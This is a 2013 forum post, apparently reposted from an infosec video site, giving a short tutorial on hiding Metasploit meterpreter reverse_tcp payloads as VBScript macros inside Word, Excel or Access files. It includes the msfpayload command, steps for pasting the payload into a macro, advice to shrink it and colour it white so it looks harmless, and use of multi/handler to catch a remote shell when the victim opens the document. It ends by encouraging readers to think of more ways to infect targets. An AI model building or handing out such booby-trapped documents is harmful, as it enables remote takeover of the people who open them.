Kwelwild Posted June 18, 2013 Report Posted June 18, 2013 http://www.youtube.com/watch?feature=player_embedded&v=DZawcrx5b_UDescription: Hello guys today I taught of making a small tutorial on using metasploit payloads as macros and use them effectively inside word, excel, access documents. So as you know creating a normal metasploit backdoor executable using msfpayload, just give the ‘V’ options which msfpayload will generate the payload in VBScript. In this case I will use a reverse connection because I love it msfpayload windows/meterpreter/reverse_tcp LHOST= [Your local Host] LPORT= [Your Local Port] V > Shell.txtWell now you should create a new word file and go to view > macors and type a random name and create a new macro. Next open up our VBScript which is shell.txt and copy the top part in the file into the Visual Basic editor and save it. Top part in the sense which gives the required functions to execute our payload. After that copy the payload part into our document and you may make the size small and make the color change into white to make non suspicious. Use multi/handler which handles exploits outside the framework to listen. So that’s it now if correctly configured everything you should get a nice reverse connection back to you once the file is opened ?. Also we can convert any executable to VBS using exe2vbs.rb located at /pentest/exploits/framework/tools/.You can imagine beyond the scope how we can infect and I think more ideas may have occurred inside you .I hope you learnt something.Thank You.Email: unownsec[at]gmail[dot]comFollow @UnownSecUn0wn_XDisclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.Original Source: Using Metasploit Payloads in Macros - YouTubeSursa: Using Metasploit Payloads In Macros Quote